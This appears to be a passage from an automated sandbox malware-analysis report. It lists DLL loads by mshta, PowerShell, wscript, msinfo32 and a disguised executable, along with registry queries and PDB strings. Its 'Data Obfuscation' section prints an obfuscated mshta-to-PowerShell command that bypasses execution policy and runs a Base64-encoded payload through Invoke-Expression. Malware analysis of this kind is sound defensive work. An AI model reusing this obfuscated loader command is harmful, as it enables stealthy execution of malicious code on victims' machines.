                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mfc42u.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                      Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\SysWOW64\msinfo32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: Binary string: msinfo32.pdb source: HDLzkMKGEKBh.exe, 0000000F.00000003.2039275924.0000000000D84000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1784118376.0000000007490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1786164092.00000000079BA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HDLzkMKGEKBh.exe, 0000000F.00000000.2024666715.000000000077E000.00000002.00000001.01000000.0000000C.sdmp, HDLzkMKGEKBh.exe, 00000011.00000000.2184131262.000000000077E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2105655055.0000000004AB8000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2117925702.0000000004C67000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, msinfo32.exe, 00000010.00000003.2105655055.0000000004AB8000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2117925702.0000000004C67000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: aspnet_compiler.pdb source: msinfo32.exe, 00000010.00000002.2659047347.000000000543C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2656376865.0000000003010000.00000004.00000020.00020000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000000.2184403066.000000000282C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2412286934.00000000094AC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1784118376.0000000007490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1786164092.00000000079BA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1786164092.00000000079BA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: msinfo32.pdbGCTL source: HDLzkMKGEKBh.exe, 0000000F.00000003.2039275924.0000000000D84000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: q8C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.pdb source: powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'<Base64 payload omitted>'+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'<Base64 payload omitted>'+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))"Jump to behavior
